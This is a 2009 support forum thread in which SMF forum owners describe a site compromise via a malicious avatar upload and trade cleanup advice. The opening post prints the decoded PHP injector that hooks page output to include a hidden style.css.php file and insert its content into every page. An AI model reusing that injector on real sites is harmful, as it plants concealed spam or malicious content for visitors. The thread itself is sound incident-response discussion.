Advertisement:

Author Topic: Hacked, script injection  (Read 216329 times)

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Hacked, script injection
« on: May 01, 2009, 10:47:02 AM »
All the php files on my site have been injected with Base64-encoded text that translates to

Code: [Select]
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directory's as well as all files that had been reinjected with the code above and the style.css.php file reappeared.. I’m stuck, I don't know what to do.

Plz help.

kat

  • Guest
Re: Hacked, script injection
« Reply #1 on: May 01, 2009, 12:50:54 PM »
If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #2 on: May 01, 2009, 12:54:16 PM »
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer



Offline Joey Smith™

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,356
  • Gender: Male
Re: Hacked, script injection
« Reply #3 on: May 01, 2009, 01:21:38 PM »
Quote
style.css.php
This is not supposed to be a php file. Its a css file...

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #4 on: May 01, 2009, 02:57:12 PM »
I have the exact same problem.

My plan is to remove SMF, the re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!

Offline karlbenson

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,614
  • Gender: Male
    • @mortonssols on Twitter
    • Criminal Solicitors
Re: Hacked, script injection
« Reply #5 on: May 01, 2009, 03:02:04 PM »
What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using on that server?
- wordpress
- any software with tinymce editor?

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #6 on: May 01, 2009, 03:08:30 PM »
I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #7 on: May 01, 2009, 07:25:53 PM »
Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 50,952
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #8 on: May 01, 2009, 07:28:19 PM »
What version of SMF were you running? 
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support forums.  Thank you.

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #9 on: May 01, 2009, 07:35:50 PM »
1.1.8

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #10 on: May 02, 2009, 06:52:06 AM »
I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"

Offline sprntrcr

  • Semi-Newbie
  • *
  • Posts: 11
Re: Hacked, script injection
« Reply #11 on: May 02, 2009, 06:59:14 AM »
Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files.   Also check Themes/default/images/bbc   That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo"  and see all the SMF forums he is a member of.   This is/could get real nasty.

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #12 on: May 02, 2009, 07:06:13 AM »
What other scripts are you running along SMF?
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer



Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #13 on: May 02, 2009, 07:31:17 AM »
I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

But now I'm having troubles with my themes.

Offline bsm

  • Semi-Newbie
  • *
  • Posts: 22
    • DatingDiva Forum
Re: Hacked, script injection
« Reply #14 on: May 04, 2009, 05:53:50 AM »
The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(

Offline vHawkeyev

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #15 on: May 04, 2009, 06:34:25 AM »
Quote
I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

Like you said it affects all php file so I replaced every one.

Offline Agent Orange

  • Semi-Newbie
  • *
  • Posts: 31
  • Gender: Male
    • Puffed Unity Fellowship
Re: Hacked, script injection
« Reply #16 on: May 04, 2009, 04:44:33 PM »
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).
« Last Edit: May 04, 2009, 05:17:28 PM by Agent Orange »

Offline JBlaze

  • Lead Customizer
  • SMF Super Hero
  • *
  • Posts: 12,114
    • zilladotexe on GitHub
    • jasonclemons1 on LinkedIn
Re: Hacked, script injection
« Reply #17 on: May 04, 2009, 04:47:53 PM »
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php?

Offline H

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 21,657
  • Gender: Male
Re: Hacked, script injection
« Reply #18 on: May 04, 2009, 05:03:20 PM »
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain
-H
Former Support Team Lead
                              I recommend:
Namecheap (domains)
Fastmail (e-mail)
Linode (VPS)
                             

Offline JBlaze

  • Lead Customizer
  • SMF Super Hero
  • *
  • Posts: 12,114
    • zilladotexe on GitHub
    • jasonclemons1 on LinkedIn
Re: Hacked, script injection
« Reply #19 on: May 04, 2009, 05:56:22 PM »
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" that the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.